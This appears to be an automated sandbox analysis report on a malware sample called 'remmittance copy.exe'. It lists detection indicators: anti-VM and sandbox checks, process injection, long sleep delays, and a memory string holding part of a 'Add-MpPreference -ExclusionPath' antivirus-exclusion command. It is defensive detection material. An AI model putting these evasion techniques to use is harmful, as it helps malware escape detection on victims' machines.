                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Yara detected AntiVM3Show sources
                      Source: Yara matchFile source: 0.2.remmittance copy.exe.2a2c9d4.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.682352085.00000000029E1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: remmittance copy.exe PID: 6336, type: MEMORYSTR
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: remmittance copy.exe, 00000000.00000002.682352085.00000000029E1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: remmittance copy.exe, 00000000.00000002.682352085.00000000029E1000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\remmittance copy.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\remmittance copy.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\remmittance copy.exe TID: 6340Thread sleep time: -30000s >= -30000s
                      Source: C:\Users\user\Desktop\remmittance copy.exe TID: 1440Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\Desktop\remmittance copy.exe TID: 588Thread sleep time: -11990383647911201s >= -30000s
                      Source: C:\Users\user\Desktop\remmittance copy.exe TID: 5348Thread sleep count: 379 > 30
                      Source: C:\Users\user\Desktop\remmittance copy.exe TID: 5348Thread sleep count: 9484 > 30
                      Source: C:\Users\user\Desktop\remmittance copy.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\remmittance copy.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\remmittance copy.exeWindow / User API: threadDelayed 379
                      Source: C:\Users\user\Desktop\remmittance copy.exeWindow / User API: threadDelayed 9484
                      Source: C:\Users\user\Desktop\remmittance copy.exeCode function: 0_2_006B7AAF sldt word ptr [eax]
                      Source: C:\Users\user\Desktop\remmittance copy.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\remmittance copy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\remmittance copy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeThread delayed: delay time: 30000
                      Source: C:\Users\user\Desktop\remmittance copy.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\remmittance copy.exeThread delayed: delay time: 922337203685477
                      Source: remmittance copy.exe, 00000000.00000002.682352085.00000000029E1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
                      Source: remmittance copy.exe, 00000000.00000002.682352085.00000000029E1000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: remmittance copy.exe, 00000000.00000002.682352085.00000000029E1000.00000004.00000001.sdmpBinary or memory string: vmware
                      Source: remmittance copy.exe, 00000005.00000002.923688399.000000000136F000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllnitoG
                      Source: remmittance copy.exe, 00000000.00000002.682352085.00000000029E1000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\remmittance copy.exeCode function: 5_2_00DC0DF8 LdrInitializeThunk,
                      Source: C:\Users\user\Desktop\remmittance copy.exeMemory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\user\Desktop\remmittance copy.exeMemory written: C:\Users\user\Desktop\remmittance copy.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess created: C:\Users\user\Desktop\remmittance copy.exe C:\Users\user\Desktop\remmittance copy.exe
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess created: C:\Users\user\Desktop\remmittance copy.exe C:\Users\user\Desktop\remmittance copy.exe
                      Source: remmittance copy.exe, 00000005.00000002.924047026.0000000001A90000.00000002.00020000.sdmpBinary or memory string: Program Manager
                      Source: remmittance copy.exe, 00000005.00000002.924047026.0000000001A90000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: remmittance copy.exe, 00000005.00000002.924047026.0000000001A90000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: remmittance copy.exe, 00000005.00000002.924047026.0000000001A90000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Users\user\Desktop\remmittance copy.exe VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\remmittance copy.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
